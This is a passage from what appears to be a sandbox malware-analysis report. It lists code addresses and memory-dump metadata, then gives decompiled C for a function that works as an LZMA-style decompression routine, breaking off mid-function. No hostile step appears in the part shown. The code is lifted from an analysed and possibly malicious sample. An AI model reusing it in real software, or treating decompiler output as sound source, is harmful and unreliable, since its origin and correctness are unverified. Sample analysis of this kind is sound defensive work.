                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x00000000
                                  0x00407267
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x00000000
                                  0x004073da
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00000000
                                  0x0040722f
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                  • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                  • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                  • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
